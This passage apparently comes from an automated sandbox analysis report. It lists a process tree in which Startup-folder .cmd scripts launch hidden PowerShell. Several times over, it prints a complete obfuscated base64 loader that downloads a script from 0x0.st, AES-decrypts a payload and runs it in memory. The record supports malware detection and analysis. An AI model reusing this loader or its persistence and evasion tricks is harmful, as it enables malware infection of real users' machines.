lNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 1472 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_47a8d5aa.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2376 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_47a8d5aa.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2032 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 1228 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b38e7755.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1768 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b38e7755.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2172 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 7420 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_50006331.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3796 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_50006331.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4464 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkZnlyYnUpLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRwa20gaW4gJHBlcGV2KSB7CWlmICgkcGttLlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRwZGZ5dT0kcGttLlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRsd2dvcz1bc3RyaW5nW11dJHBkZnl1LlNwbGl0KCdcJyk7SUVYICcka21zbHU9ZWJpYnQgKHNlcmp3IChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGx3Z29zWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGRhenNqPWViaWJ0IChzZXJqdyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRsd2dvc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxaGhmbyAka21zbHUgJG51bGw7cWhoZm8gJGRhenNqICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5896 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_1baed2c6.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3300 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_1baed2c6.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5508 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFC